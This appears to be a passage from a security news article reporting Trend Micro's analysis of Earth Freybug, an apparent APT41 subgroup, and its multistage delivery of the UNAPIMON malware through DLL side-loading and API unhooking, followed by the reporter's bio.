Trend Micro assessed Earth Freybug as being a subset of APT41, a collective of Chinese threat groups variously referred to as Winnti, Wicked Panda, Barium, and Suckfly. The group is known for using a collection of custom tools and so-called living-off-the-land binaries (LOLbins) that manipulate legitimate system binaries such as PowerShell and Windows Management Instrumentation (WMI).

APT41 itself has been active since at least 2012 and is linked to numerous cyber espionage campaigns, supply chain attacks, and financially motivated cybercrime. In 2022, researchers at Cybereason identified the threat actor as stealing large volumes of trade secrets and intellectual property from companies in the US and Asia for years. Its victims have included manufacturing and IT organizations, governments, and critical infrastructure targets in the US, East Asia, and Europe. In 2020, the US government charged five members believed to be associated with the group for their role in attacks against more than 100 organizations globally.

**Attack Chain**

In the recent incident that Trend Micro observed, Earth Freybug actors used a multistaged approach to delivering UNAPIMON on target systems. In the first stage, the attackers injected malicious code of unknown origin into vmstools.exe, a process associated with a set of utilities for facilitating communications between a guest virtual machine and the underlying host machine. The malicious code created a scheduled task on the host machine to run a batch script file (cc.bat) on the host system.

The batch file's task is to collect a range of system information and initiate a second scheduled task to run a cc.bat file on the infected host. The second batch script file leverages SessionEnv, a Windows service for managing remote desktop services, to side-load a malicious dynamic link library (DLL) on the infected host. "The second cc.bat is notable for leveraging a service that loads a nonexistent library to side-load a malicious DLL. In this case, the service is SessionEnv," Trend Micro said.

The malicious DLL then drops UNAPIMON on the Windows service for defense evasion purposes and also on a cmd.exe process that quietly executes commands. "UNAPIMON itself is straightforward: It is a DLL malware written in C++ and is neither packed nor obfuscated; it is not encrypted save for a single string," Trend Micro said. What makes it "peculiar" is its defense evasion technique of unhooking APIs so that the malware's malicious processes remain invisible to threat detection tools. "In typical scenarios, it is the malware that does the hooking. However, it is the opposite in this case," Trend Micro said.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#git